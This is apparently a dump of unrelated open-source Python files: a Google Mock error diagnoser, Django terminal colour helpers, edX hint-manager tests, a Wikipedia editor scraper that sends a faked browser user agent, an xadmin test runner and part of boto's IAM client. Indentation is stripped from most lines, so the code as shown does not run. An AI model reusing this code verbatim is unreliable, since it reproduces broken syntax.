The closing parenthesis of ON_CALL or EXPECT_CALL should be *before*
".%(method)s". For example, you should write:
EXPECT_CALL(my_mock, Foo(_)).%(method)s(...);
instead of:
EXPECT_CALL(my_mock, Foo(_).%(method)s(...));"""
return _GenericDiagnoser('WPP', 'Wrong Parenthesis Position',
[(gcc_regex, diagnosis),
(clang_regex, diagnosis)],
msg)
_DIAGNOSERS = [
_IncompleteByReferenceArgumentDiagnoser,
_MockObjectPointerDiagnoser,
_NeedToReturnNothingDiagnoser,
_NeedToReturnReferenceDiagnoser,
_NeedToReturnSomethingDiagnoser,
_NeedToUseReturnNullDiagnoser,
_NeedToUseSymbolDiagnoser,
_OverloadedFunctionActionDiagnoser,
_OverloadedFunctionMatcherDiagnoser,
_OverloadedMethodActionDiagnoser,
_TypeInTemplatedBaseDiagnoser,
_WrongMockMethodMacroDiagnoser,
_WrongParenPositionDiagnoser,
]
def Diagnose(msg):
"""Generates all possible diagnoses given the compiler error message."""
msg = re.sub(r'\x1b\[[^m]*m', '', msg) # Strips all color formatting.
# Assuming the string is using the UTF-8 encoding, replaces the left and
# the right single quote characters with apostrophes.
msg = re.sub(r'(\xe2\x80\x98|\xe2\x80\x99)', "'", msg)
diagnoses = []
for diagnoser in _DIAGNOSERS:
for diag in diagnoser(msg):
diagnosis = '[%s - %s]\n%s' % diag
if not diagnosis in diagnoses:
diagnoses.append(diagnosis)
return diagnoses
def main():
print ('Google Mock Doctor v%s - '
'diagnoses problems in code using Google Mock.' % _VERSION)
if sys.stdin.isatty():
    print ('Please copy and paste the compiler errors here. Press Ctrl-D when '
           'you are done:')
else:
print 'Waiting for compiler errors on stdin . . .'
msg = sys.stdin.read().strip()
diagnoses = Diagnose(msg)
count = len(diagnoses)
if not count:
print ("""
Your compiler complained:
8<------------------------------------------------------------
%s
------------------------------------------------------------>8
Uh-oh, I'm not smart enough to figure out what the problem is. :-(
However...
If you send your source code and the compiler's error messages to
%s, you can be helped and I can get smarter --
win-win for us!""" % (msg, _EMAIL))
else:
print '------------------------------------------------------------'
print 'Your code appears to have the following',
if count > 1:
print '%s diseases:' % (count,)
else:
print 'disease:'
i = 0
for d in diagnoses:
i += 1
if count > 1:
print '\n#%s:' % (i,)
print d
print ("""
How did I do? If you think I'm wrong or unhelpful, please send your
source code and the compiler's error messages to %s.
Then you can be helped and I can get smarter -- I promise I won't be upset!""" %
_EMAIL)
if __name__ == '__main__':
main()
| bsd-3-clause |
carlmw/oscar-wager | django/utils/termcolors.py | 417 | 6885 | """
termcolors.py
"""
color_names = ('black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white')
foreground = dict([(color_names[x], '3%s' % x) for x in range(8)])
background = dict([(color_names[x], '4%s' % x) for x in range(8)])
RESET = '0'
opt_dict = {'bold': '1', 'underscore': '4', 'blink': '5', 'reverse': '7', 'conceal': '8'}
def colorize(text='', opts=(), **kwargs):
"""
Returns your text, enclosed in ANSI graphics codes.
Depends on the keyword arguments 'fg' and 'bg', and the contents of
the opts tuple/list.
Returns the RESET code if no parameters are given.
Valid colors:
'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white'
Valid options:
'bold'
'underscore'
'blink'
'reverse'
'conceal'
'noreset' - string will not be auto-terminated with the RESET code
Examples:
colorize('hello', fg='red', bg='blue', opts=('blink',))
colorize()
colorize('goodbye', opts=('underscore',))
print colorize('first line', fg='red', opts=('noreset',))
print 'this should be red too'
print colorize('and so should this')
print 'this should not be red'
"""
code_list = []
if text == '' and len(opts) == 1 and opts[0] == 'reset':
return '\x1b[%sm' % RESET
for k, v in kwargs.iteritems():
if k == 'fg':
code_list.append(foreground[v])
elif k == 'bg':
code_list.append(background[v])
for o in opts:
if o in opt_dict:
code_list.append(opt_dict[o])
if 'noreset' not in opts:
text = text + '\x1b[%sm' % RESET
return ('\x1b[%sm' % ';'.join(code_list)) + text
def make_style(opts=(), **kwargs):
"""
Returns a function with default parameters for colorize()
Example:
bold_red = make_style(opts=('bold',), fg='red')
print bold_red('hello')
KEYWORD = make_style(fg='yellow')
COMMENT = make_style(fg='blue', opts=('bold',))
"""
return lambda text: colorize(text, opts, **kwargs)
NOCOLOR_PALETTE = 'nocolor'
DARK_PALETTE = 'dark'
LIGHT_PALETTE = 'light'
PALETTES = {
NOCOLOR_PALETTE: {
'ERROR': {},
'NOTICE': {},
'SQL_FIELD': {},
'SQL_COLTYPE': {},
'SQL_KEYWORD': {},
'SQL_TABLE': {},
'HTTP_INFO': {},
'HTTP_SUCCESS': {},
'HTTP_REDIRECT': {},
'HTTP_NOT_MODIFIED': {},
'HTTP_BAD_REQUEST': {},
'HTTP_NOT_FOUND': {},
'HTTP_SERVER_ERROR': {},
},
DARK_PALETTE: {
'ERROR': { 'fg': 'red', 'opts': ('bold',) },
'NOTICE': { 'fg': 'red' },
'SQL_FIELD': { 'fg': 'green', 'opts': ('bold',) },
'SQL_COLTYPE': { 'fg': 'green' },
'SQL_KEYWORD': { 'fg': 'yellow' },
'SQL_TABLE': { 'opts': ('bold',) },
'HTTP_INFO': { 'opts': ('bold',) },
'HTTP_SUCCESS': { },
'HTTP_REDIRECT': { 'fg': 'green' },
'HTTP_NOT_MODIFIED': { 'fg': 'cyan' },
'HTTP_BAD_REQUEST': { 'fg': 'red', 'opts': ('bold',) },
'HTTP_NOT_FOUND': { 'fg': 'yellow' },
'HTTP_SERVER_ERROR': { 'fg': 'magenta', 'opts': ('bold',) },
},
LIGHT_PALETTE: {
'ERROR': { 'fg': 'red', 'opts': ('bold',) },
'NOTICE': { 'fg': 'red' },
'SQL_FIELD': { 'fg': 'green', 'opts': ('bold',) },
'SQL_COLTYPE': { 'fg': 'green' },
'SQL_KEYWORD': { 'fg': 'blue' },
'SQL_TABLE': { 'opts': ('bold',) },
'HTTP_INFO': { 'opts': ('bold',) },
'HTTP_SUCCESS': { },
'HTTP_REDIRECT': { 'fg': 'green', 'opts': ('bold',) },
'HTTP_NOT_MODIFIED': { 'fg': 'green' },
'HTTP_BAD_REQUEST': { 'fg': 'red', 'opts': ('bold',) },
'HTTP_NOT_FOUND': { 'fg': 'red' },
'HTTP_SERVER_ERROR': { 'fg': 'magenta', 'opts': ('bold',) },
}
}
DEFAULT_PALETTE = DARK_PALETTE
def parse_color_setting(config_string):
"""Parse a DJANGO_COLORS environment variable to produce the system palette
    The general form of a palette definition is:
        "palette;role=fg;role=fg/bg;role=fg,option,option;role=fg/bg,option,option"
    where:
        palette is a named palette; one of 'light', 'dark', or 'nocolor'.
        role is a named style used by Django.
        fg is a foreground color.
        bg is a background color.
        option is a display option.
    Specifying a named palette is the same as manually specifying the individual
    definitions for each role. Any individual definitions following the palette
    definition will augment the base palette definition.
Valid roles:
'error', 'notice', 'sql_field', 'sql_coltype', 'sql_keyword', 'sql_table',
'http_info', 'http_success', 'http_redirect', 'http_bad_request',
'http_not_found', 'http_server_error'
Valid colors:
'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white'
Valid options:
'bold', 'underscore', 'blink', 'reverse', 'conceal'
"""
if not config_string:
return PALETTES[DEFAULT_PALETTE]
# Split the color configuration into parts
parts = config_string.lower().split(';')
palette = PALETTES[NOCOLOR_PALETTE].copy()
for part in parts:
if part in PALETTES:
# A default palette has been specified
palette.update(PALETTES[part])
elif '=' in part:
# Process a palette defining string
definition = {}
# Break the definition into the role,
# plus the list of specific instructions.
# The role must be in upper case
role, instructions = part.split('=')
role = role.upper()
styles = instructions.split(',')
styles.reverse()
# The first instruction can contain a slash
# to break apart fg/bg.
colors = styles.pop().split('/')
colors.reverse()
fg = colors.pop()
if fg in color_names:
definition['fg'] = fg
if colors and colors[-1] in color_names:
definition['bg'] = colors[-1]
# All remaining instructions are options
opts = tuple(s for s in styles if s in opt_dict.keys())
if opts:
definition['opts'] = opts
# The nocolor palette has all available roles.
# Use that palette as the basis for determining
# if the role is valid.
if role in PALETTES[NOCOLOR_PALETTE] and definition:
palette[role] = definition
# If there are no colors specified, return the empty palette.
if palette == PALETTES[NOCOLOR_PALETTE]:
return None
return palette
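if __name__ == '__main__':
    # Minimal demo (not part of the original module; safe to remove). The
    # palette string below is a hypothetical DJANGO_COLORS value.
    bold_red = make_style(opts=('bold',), fg='red')
    print bold_red('hello')
    palette = parse_color_setting('light;error=yellow/blue,blink;notice=magenta')
    print palette['ERROR']  # {'fg': 'yellow', 'bg': 'blue', 'opts': ('blink',)}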
| bsd-3-clause |
abo-abo/edx-platform | lms/djangoapps/instructor/tests/test_hint_manager.py | 31 | 9180 | import json
from django.test.client import Client, RequestFactory
from django.test.utils import override_settings
from mock import patch, MagicMock
from courseware.models import XModuleUserStateSummaryField
from courseware.tests.factories import UserStateSummaryFactory
from courseware.tests.modulestore_config import TEST_DATA_MIXED_MODULESTORE
import instructor.hint_manager as view
from student.tests.factories import UserFactory
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class HintManagerTest(ModuleStoreTestCase):
def setUp(self):
"""
Makes a course, which will be the same for all tests.
Set up mako middleware, which is necessary for template rendering to happen.
"""
self.course = CourseFactory.create(org='Me', number='19.002', display_name='test_course')
self.url = '/courses/Me/19.002/test_course/hint_manager'
self.user = UserFactory.create(username='robot', email='[email protected]', password='test', is_staff=True)
self.c = Client()
self.c.login(username='robot', password='test')
self.problem_id = 'i4x://Me/19.002/crowdsource_hinter/crowdsource_hinter_001'
self.course_id = 'Me/19.002/test_course'
UserStateSummaryFactory.create(field_name='hints',
usage_id=self.problem_id,
value=json.dumps({'1.0': {'1': ['Hint 1', 2],
'3': ['Hint 3', 12]},
'2.0': {'4': ['Hint 4', 3]}
}))
UserStateSummaryFactory.create(field_name='mod_queue',
usage_id=self.problem_id,
value=json.dumps({'2.0': {'2': ['Hint 2', 1]}}))
UserStateSummaryFactory.create(field_name='hint_pk',
usage_id=self.problem_id,
value=5)
# Mock out location_to_problem_name, which ordinarily accesses the modulestore.
# (I can't figure out how to get fake structures into the modulestore.)
view.location_to_problem_name = lambda course_id, loc: "Test problem"
def test_student_block(self):
"""
Makes sure that students cannot see the hint management view.
"""
c = Client()
UserFactory.create(username='student', email='[email protected]', password='test')
c.login(username='student', password='test')
out = c.get(self.url)
print out
self.assertTrue('Sorry, but students are not allowed to access the hint manager!' in out.content)
def test_staff_access(self):
"""
Makes sure that staff can access the hint management view.
"""
out = self.c.get('/courses/Me/19.002/test_course/hint_manager')
print out
self.assertTrue('Hints Awaiting Moderation' in out.content)
def test_invalid_field_access(self):
"""
Makes sure that field names other than 'mod_queue' and 'hints' are
rejected.
"""
out = self.c.post(self.url, {'op': 'delete hints', 'field': 'all your private data'})
print out
self.assertTrue('an invalid field was accessed' in out.content)
def test_switchfields(self):
"""
Checks that the op: 'switch fields' POST request works.
"""
out = self.c.post(self.url, {'op': 'switch fields', 'field': 'mod_queue'})
print out
self.assertTrue('Hint 2' in out.content)
def test_gethints(self):
"""
Checks that gethints returns the right data.
"""
request = RequestFactory()
post = request.post(self.url, {'field': 'mod_queue'})
out = view.get_hints(post, self.course_id, 'mod_queue')
print out
self.assertTrue(out['other_field'] == 'hints')
expected = {self.problem_id: [(u'2.0', {u'2': [u'Hint 2', 1]})]}
self.assertTrue(out['all_hints'] == expected)
def test_gethints_other(self):
"""
Same as above, with hints instead of mod_queue
"""
request = RequestFactory()
post = request.post(self.url, {'field': 'hints'})
out = view.get_hints(post, self.course_id, 'hints')
print out
self.assertTrue(out['other_field'] == 'mod_queue')
expected = {self.problem_id: [('1.0', {'1': ['Hint 1', 2],
'3': ['Hint 3', 12]}),
('2.0', {'4': ['Hint 4', 3]})
]}
self.assertTrue(out['all_hints'] == expected)
def test_deletehints(self):
"""
Checks that delete_hints deletes the right stuff.
"""
request = RequestFactory()
post = request.post(self.url, {'field': 'hints',
'op': 'delete hints',
1: [self.problem_id, '1.0', '1']})
view.delete_hints(post, self.course_id, 'hints')
problem_hints = XModuleUserStateSummaryField.objects.get(field_name='hints', usage_id=self.problem_id).value
self.assertTrue('1' not in json.loads(problem_hints)['1.0'])
def test_changevotes(self):
"""
Checks that vote changing works.
"""
request = RequestFactory()
post = request.post(self.url, {'field': 'hints',
'op': 'change votes',
1: [self.problem_id, '1.0', '1', 5]})
view.change_votes(post, self.course_id, 'hints')
problem_hints = XModuleUserStateSummaryField.objects.get(field_name='hints', usage_id=self.problem_id).value
# hints[answer][hint_pk (string)] = [hint text, vote count]
print json.loads(problem_hints)['1.0']['1']
self.assertTrue(json.loads(problem_hints)['1.0']['1'][1] == 5)
def test_addhint(self):
"""
Check that instructors can add new hints.
"""
# Because add_hint accesses the xmodule, this test requires a bunch
# of monkey patching.
hinter = MagicMock()
hinter.validate_answer = lambda string: True
request = RequestFactory()
post = request.post(self.url, {'field': 'mod_queue',
'op': 'add hint',
'problem': self.problem_id,
'answer': '3.14',
'hint': 'This is a new hint.'})
post.user = 'fake user'
with patch('courseware.module_render.get_module', MagicMock(return_value=hinter)):
with patch('courseware.model_data.FieldDataCache', MagicMock(return_value=None)):
view.add_hint(post, self.course_id, 'mod_queue')
problem_hints = XModuleUserStateSummaryField.objects.get(field_name='mod_queue', usage_id=self.problem_id).value
self.assertTrue('3.14' in json.loads(problem_hints))
def test_addbadhint(self):
"""
Check that instructors cannot add hints with unparsable answers.
"""
# Patching.
hinter = MagicMock()
hinter.validate_answer = lambda string: False
request = RequestFactory()
post = request.post(self.url, {'field': 'mod_queue',
'op': 'add hint',
'problem': self.problem_id,
'answer': 'fish',
'hint': 'This is a new hint.'})
post.user = 'fake user'
with patch('courseware.module_render.get_module', MagicMock(return_value=hinter)):
with patch('courseware.model_data.FieldDataCache', MagicMock(return_value=None)):
view.add_hint(post, self.course_id, 'mod_queue')
problem_hints = XModuleUserStateSummaryField.objects.get(field_name='mod_queue', usage_id=self.problem_id).value
self.assertTrue('fish' not in json.loads(problem_hints))
def test_approve(self):
"""
Check that instructors can approve hints. (Move them
from the mod_queue to the hints.)
"""
request = RequestFactory()
post = request.post(self.url, {'field': 'mod_queue',
'op': 'approve',
1: [self.problem_id, '2.0', '2']})
view.approve(post, self.course_id, 'mod_queue')
problem_hints = XModuleUserStateSummaryField.objects.get(field_name='mod_queue', usage_id=self.problem_id).value
self.assertTrue('2.0' not in json.loads(problem_hints) or len(json.loads(problem_hints)['2.0']) == 0)
problem_hints = XModuleUserStateSummaryField.objects.get(field_name='hints', usage_id=self.problem_id).value
self.assertTrue(json.loads(problem_hints)['2.0']['2'] == ['Hint 2', 1])
self.assertTrue(len(json.loads(problem_hints)['2.0']) == 2)
| agpl-3.0 |
louisdijkstra/chemical-youth | bin/scrape-users.py | 1 | 5646 | #!/usr/bin/env python
from __future__ import print_function, division
from optparse import OptionParser
import os
import sys
# add the python directory
sys.path.insert(0, os.path.abspath(os.path.dirname(__file__))[:-3] + 'python')
from WikipediaScraper import *
__author__ = "Louis Dijkstra"
usage = """%prog <title> <output.csv>
<title> title of the wikipedia page to be crawled or a
file with a list of titles (every row a different
title)
<output.csv> output file location
Scraps the users that made revisions to the Wikipedia pages whos title
are given in the <title> argument. The output is stored in CSV format
(tab-delimited). It contains the following columns:
name - title of the page
user - the user name or ip that made a revision
n_edits - the total number of edits that user made
n_minor_edits - the number of minor edits that user made
first_edit - the time of the first edit
last_edit - the time of the last edit
added_bytes - the total number of bytes added
"""
USER_AGENT = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
GET_DATA_SUCCESS = 1
GET_DATA_FAILURE = 0
def printHeader(file):
print("name\tuser\tn_edits\tn_minor_edits\tfirst_edit\tlast_edit\tadded_bytes", file=file)
def get_data(raw_data, name, file=sys.stdout):
"""
Processes the raw data from the website and outputs
the data of interest
"""
raw_data = raw_data.splitlines() # split it in lines
# print(raw_data)
# go to the table of relevance
i = 0
line = raw_data[i]
    while 'Added (Bytes)' not in line:
i += 1
try:
line = raw_data[i]
        except IndexError:
return GET_DATA_FAILURE
i += 3 # get to the starting point of the list
line = raw_data[i]
while len(line) != 0: # not the end of the table
print(name, end='\t', file=file)
print(line.strip(), end='\t', file=file) # user name
i += 5
line = raw_data[i]
print(line.strip(), end='\t', file=file) # number of edits
i += 1
line = raw_data[i]
print(line.strip(), end='\t', file=file) # number of minor edits
i += 2
line = raw_data[i]
print(line.strip(), end='\t', file=file) # first edit
i += 1
line = raw_data[i]
print(line.strip(), end='\t', file=file) # last edit
i += 2
line = raw_data[i]
print(line.strip(), file=file) # added_bytes
i += 3
line = raw_data[i]
return GET_DATA_SUCCESS
def sleep(options):
    if options.sleep is not None:
        if options.verbose:
            print('Sleeping for %d seconds...' % options.sleep)
        time.sleep(options.sleep)
def main():
parser = OptionParser(usage=usage)
parser.add_option("--file", "-f", action="store", dest="file", default=None,
help="A file with pages scraped already. When given, scrawled page are not scrawled again (Default: None)")
parser.add_option("--sleep", "-s", action="store", dest="sleep", default=None, type=float,
help="Sleep time scraping two pages. (Default: no sleep)")
parser.add_option("--top", "-t", action="store", dest="top", default=10000, type=int,
help="Number of top users to be scraped. (Default: 10000)")
parser.add_option("-v", action="store_true", dest="verbose", default=False,
help="verbose.")
(options, args) = parser.parse_args()
# process arguments
    if len(args) != 2:
parser.print_help()
return 1
# get the links to be scraped
already_scraped = set()
    if options.file is not None:
oldfile = open(options.file, 'r')
next(oldfile) # ignore header
for line in oldfile:
line = line.split()
already_scraped.add(line[0].strip())
try: # in case a file is passed as the first argument
linkfile = open(args[0], 'r')
names, links = [], []
for name in linkfile:
name = name.strip()
if name in already_scraped:
continue
link = "https://tools.wmflabs.org/xtools-articleinfo/?article=" + name.strip() + "&project=en.wikipedia.org&editorlimit=" + str(options.top) + "#topeditors"
# add to the lists
names.append(name)
links.append(link)
    except IOError: # in case just one title is given
names, links = [args[0]], ["https://tools.wmflabs.org/xtools-articleinfo/?article=" + args[0] + "&project=en.wikipedia.org&editorlimit=" + str(options.top) + "#topeditors"]
outputfilename = args[1]
if options.verbose: # prints the list of pages to be scraped
print("\nList of pages to be scraped:\n")
print("title\t\tlink")
print("-----\t\t----")
for name, link in zip(names, links):
print("%s\t\t%s"%(name, link))
print("-----\t\t----\n\n")
i = 0
n_links = len(links)
outputfile = open(outputfilename, 'w')
printHeader(outputfile)
list_names_failed = []
# go through all the wikipedia links
for name, link in zip(names, links):
if options.verbose:
i += 1
print('%d of %d links processed (%.2f %%)\t%d of %d links failed (%.2f %%)'%(i, n_links, float(i) / float(n_links) * 100, len(list_names_failed), i, float(len(list_names_failed)) / float(i) * 100))
print("Continuing with scraping %s (link: %s)"%(name, link))
        # get the raw data
        data = readInDataFromURL(link, headers=USER_AGENT)
flag = get_data(data, name, file=outputfile)
if flag == GET_DATA_FAILURE:
list_names_failed.append(name)
sleep(options)
if options.verbose:
print(" DONE")
# print list of failed names:
print('\npages that failed:\n\n')
for page in list_names_failed:
print(page)
if __name__ == '__main__':
sys.exit(main()) | mit |
jneight/django-xadmin | tests/runtests.py | 5 | 6424 | #!/usr/bin/env python
import os
import shutil
import sys
import tempfile
TEST_ROOT = os.path.realpath(os.path.dirname(__file__))
RUNTESTS_DIR = os.path.join(TEST_ROOT, 'xtests')
sys.path.insert(0, os.path.join(TEST_ROOT, os.pardir))
sys.path.insert(0, RUNTESTS_DIR)
TEST_TEMPLATE_DIR = 'templates'
TEMP_DIR = tempfile.mkdtemp(prefix='django_')
os.environ['DJANGO_TEST_TEMP_DIR'] = TEMP_DIR
ALWAYS_INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'xadmin',
'crispy_forms',
]
def get_test_modules():
modules = []
for f in os.listdir(RUNTESTS_DIR):
if (f.startswith('__init__') or
f.startswith('.') or
f.startswith('sql') or not os.path.isdir(os.path.join(RUNTESTS_DIR, f))):
continue
modules.append(f)
return modules
def setup(verbosity, test_labels):
from django.conf import settings
state = {
'INSTALLED_APPS': settings.INSTALLED_APPS,
'ROOT_URLCONF': getattr(settings, "ROOT_URLCONF", ""),
'TEMPLATE_DIRS': settings.TEMPLATE_DIRS,
'USE_I18N': settings.USE_I18N,
'LOGIN_URL': settings.LOGIN_URL,
'LANGUAGE_CODE': settings.LANGUAGE_CODE,
'MIDDLEWARE_CLASSES': settings.MIDDLEWARE_CLASSES,
'STATIC_URL': settings.STATIC_URL,
'STATIC_ROOT': settings.STATIC_ROOT,
}
# Redirect some settings for the duration of these tests.
settings.INSTALLED_APPS = ALWAYS_INSTALLED_APPS
settings.ROOT_URLCONF = 'urls'
settings.STATIC_URL = '/static/'
settings.STATIC_ROOT = os.path.join(TEMP_DIR, 'static')
settings.TEMPLATE_DIRS = (os.path.join(RUNTESTS_DIR, TEST_TEMPLATE_DIR),)
settings.USE_I18N = True
settings.LANGUAGE_CODE = 'en'
settings.MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.common.CommonMiddleware',
)
settings.SITE_ID = 1
# For testing comment-utils, we require the MANAGERS attribute
# to be set, so that a test email is sent out which we catch
# in our tests.
settings.MANAGERS = ("[email protected]",)
# Load all the ALWAYS_INSTALLED_APPS.
# (This import statement is intentionally delayed until after we
# access settings because of the USE_I18N dependency.)
from django.db.models.loading import get_apps, load_app
get_apps()
# Load all the test model apps.
test_labels_set = set([label.split('.')[0] for label in test_labels])
test_modules = get_test_modules()
for module_name in test_modules:
module_label = '.'.join(['xtests', module_name])
# if the module was named on the command line, or
# no modules were named (i.e., run all), import
# this module and add it to the list to test.
if not test_labels or module_name in test_labels_set:
if verbosity >= 2:
print "Importing application %s" % module_name
mod = load_app(module_label)
if mod:
if module_label not in settings.INSTALLED_APPS:
settings.INSTALLED_APPS.append(module_label)
return state
def teardown(state):
from django.conf import settings
# Removing the temporary TEMP_DIR. Ensure we pass in unicode
# so that it will successfully remove temp trees containing
# non-ASCII filenames on Windows. (We're assuming the temp dir
# name itself does not contain non-ASCII characters.)
shutil.rmtree(unicode(TEMP_DIR))
# Restore the old settings.
for key, value in state.items():
setattr(settings, key, value)
def django_tests(verbosity, interactive, failfast, test_labels):
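    # Rewires global Django settings via setup(), runs the suite, then
    # restores the originals in teardown().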
from django.conf import settings
state = setup(verbosity, test_labels)
extra_tests = []
# Run the test suite, including the extra validation tests.
from django.test.utils import get_runner
if not hasattr(settings, 'TEST_RUNNER'):
settings.TEST_RUNNER = 'django.test.simple.DjangoTestSuiteRunner'
TestRunner = get_runner(settings)
test_runner = TestRunner(verbosity=verbosity, interactive=interactive,
failfast=failfast)
failures = test_runner.run_tests(test_labels or get_test_modules(), extra_tests=extra_tests)
teardown(state)
return failures
if __name__ == "__main__":
from optparse import OptionParser
usage = "%prog [options] [module module module ...]"
parser = OptionParser(usage=usage)
parser.add_option(
'-v','--verbosity', action='store', dest='verbosity', default='1',
type='choice', choices=['0', '1', '2', '3'],
        help='Verbosity level; 0=minimal output, 1=normal output, 2=verbose '
             'output, 3=very verbose output')
parser.add_option(
'--noinput', action='store_false', dest='interactive', default=True,
help='Tells Django to NOT prompt the user for input of any kind.')
parser.add_option(
'--failfast', action='store_true', dest='failfast', default=False,
help='Tells Django to stop running the test suite after first failed '
'test.')
parser.add_option(
'--settings',
help='Python path to settings module, e.g. "myproject.settings". If '
'this isn\'t provided, the DJANGO_SETTINGS_MODULE environment '
'variable will be used.')
parser.add_option(
'--liveserver', action='store', dest='liveserver', default=None,
help='Overrides the default address where the live server (used with '
'LiveServerTestCase) is expected to run from. The default value '
             'is localhost:8081.')
options, args = parser.parse_args()
if options.settings:
os.environ['DJANGO_SETTINGS_MODULE'] = options.settings
elif "DJANGO_SETTINGS_MODULE" not in os.environ:
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
else:
options.settings = os.environ['DJANGO_SETTINGS_MODULE']
if options.liveserver is not None:
os.environ['DJANGO_LIVE_TEST_SERVER_ADDRESS'] = options.liveserver
failures = django_tests(int(options.verbosity), options.interactive,
options.failfast, args)
if failures:
sys.exit(bool(failures))
| bsd-3-clause |
Nexenta/s3-tests | virtualenv/lib/python2.7/site-packages/boto/iam/connection.py | 12 | 57215 | # Copyright (c) 2010-2011 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2010-2011, Eucalyptus Systems, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import boto
import boto.jsonresponse
from boto.compat import json, six
from boto.resultset import ResultSet
from boto.iam.summarymap import SummaryMap
from boto.connection import AWSQueryConnection
DEFAULT_POLICY_DOCUMENTS = {
'default': {
'Statement': [
{
'Principal': {
'Service': ['ec2.amazonaws.com']
},
'Effect': 'Allow',
'Action': ['sts:AssumeRole']
}
]
},
'amazonaws.com.cn': {
'Statement': [
{
'Principal': {
'Service': ['ec2.amazonaws.com.cn']
},
'Effect': 'Allow',
'Action': ['sts:AssumeRole']
}
]
},
}
# For backward-compatibility, we'll preserve this here.
ASSUME_ROLE_POLICY_DOCUMENT = json.dumps(DEFAULT_POLICY_DOCUMENTS['default'])
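# Illustrative only (the role name below is hypothetical): when create_role
# is called without an explicit policy, _build_policy falls back to the
# 'default' document above, so
#   IAMConnection().create_role('example-role')
# sends an AssumeRolePolicyDocument equal to ASSUME_ROLE_POLICY_DOCUMENT.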
class IAMConnection(AWSQueryConnection):
APIVersion = '2010-05-08'
def __init__(self, aws_access_key_id=None, aws_secret_access_key=None,
is_secure=True, port=None, proxy=None, proxy_port=None,
proxy_user=None, proxy_pass=None, host='iam.amazonaws.com',
debug=0, https_connection_factory=None, path='/',
security_token=None, validate_certs=True, profile_name=None):
super(IAMConnection, self).__init__(aws_access_key_id,
aws_secret_access_key,
is_secure, port, proxy,
proxy_port, proxy_user, proxy_pass,
host, debug, https_connection_factory,
path, security_token,
validate_certs=validate_certs,
profile_name=profile_name)
def _required_auth_capability(self):
return ['hmac-v4']
def get_response(self, action, params, path='/', parent=None,
verb='POST', list_marker='Set'):
"""
Utility method to handle calls to IAM and parsing of responses.
"""
if not parent:
parent = self
response = self.make_request(action, params, path, verb)
body = response.read()
boto.log.debug(body)
if response.status == 200:
if body:
e = boto.jsonresponse.Element(list_marker=list_marker,
pythonize_name=True)
h = boto.jsonresponse.XmlHandler(e, parent)
h.parse(body)
return e
else:
# Support empty responses, e.g. deleting a SAML provider
# according to the official documentation.
return {}
else:
boto.log.error('%s %s' % (response.status, response.reason))
boto.log.error('%s' % body)
raise self.ResponseError(response.status, response.reason, body)
#
# Group methods
#
def get_all_groups(self, path_prefix='/', marker=None, max_items=None):
"""
List the groups that have the specified path prefix.
:type path_prefix: string
:param path_prefix: If provided, only groups whose paths match
the provided prefix will be returned.
:type marker: string
:param marker: Use this only when paginating results and only
in follow-up request after you've received a response
where the results are truncated. Set this to the value of
the Marker element in the response you just received.
:type max_items: int
:param max_items: Use this only when paginating results to indicate
the maximum number of groups you want in the response.
"""
params = {}
if path_prefix:
params['PathPrefix'] = path_prefix
if marker:
params['Marker'] = marker
if max_items:
params['MaxItems'] = max_items
return self.get_response('ListGroups', params,
list_marker='Groups')
def get_group(self, group_name, marker=None, max_items=None):
"""
Return a list of users that are in the specified group.
:type group_name: string
:param group_name: The name of the group whose information should
be returned.
:type marker: string
:param marker: Use this only when paginating results and only
in follow-up request after you've received a response
where the results are truncated. Set this to the value of
the Marker element in the response you just received.
:type max_items: int
:param max_items: Use this only when paginating results to indicate
the maximum number of groups you want in the response.
"""
params = {'GroupName': group_name}
if marker:
params['Marker'] = marker
if max_items:
params['MaxItems'] = max_items
return self.get_response('GetGroup', params, list_marker='Users')
def create_group(self, group_name, path='/'):
"""
Create a group.
:type group_name: string
:param group_name: The name of the new group
:type path: string
:param path: The path to the group (Optional). Defaults to /.
"""
params = {'GroupName': group_name,
'Path': path}
return self.get_response('CreateGroup', params)
def delete_group(self, group_name):
"""
Delete a group. The group must not contain any Users or
have any attached policies
:type group_name: string
:param group_name: The name of the group to delete.
"""
params = {'GroupName': group_name}
return self.get_response('DeleteGroup', params)
def update_group(self, group_name, new_group_name=None, new_path=None):
"""
Updates name and/or path of the specified group.
:type group_name: string
:param group_name: The name of the new group
:type new_group_name: string
:param new_group_name: If provided, the name of the group will be
changed to this name.
:type new_path: string
:param new_path: If provided, the path of the group will be
changed to this path.
"""
params = {'GroupName': group_name}
if new_group_name:
params['NewGroupName'] = new_group_name
if new_path:
params['NewPath'] = new_path
return self.get_response('UpdateGroup', params)
def add_user_to_group(self, group_name, user_name):
"""
Add a user to a group
:type group_name: string
:param group_name: The name of the group
:type user_name: string
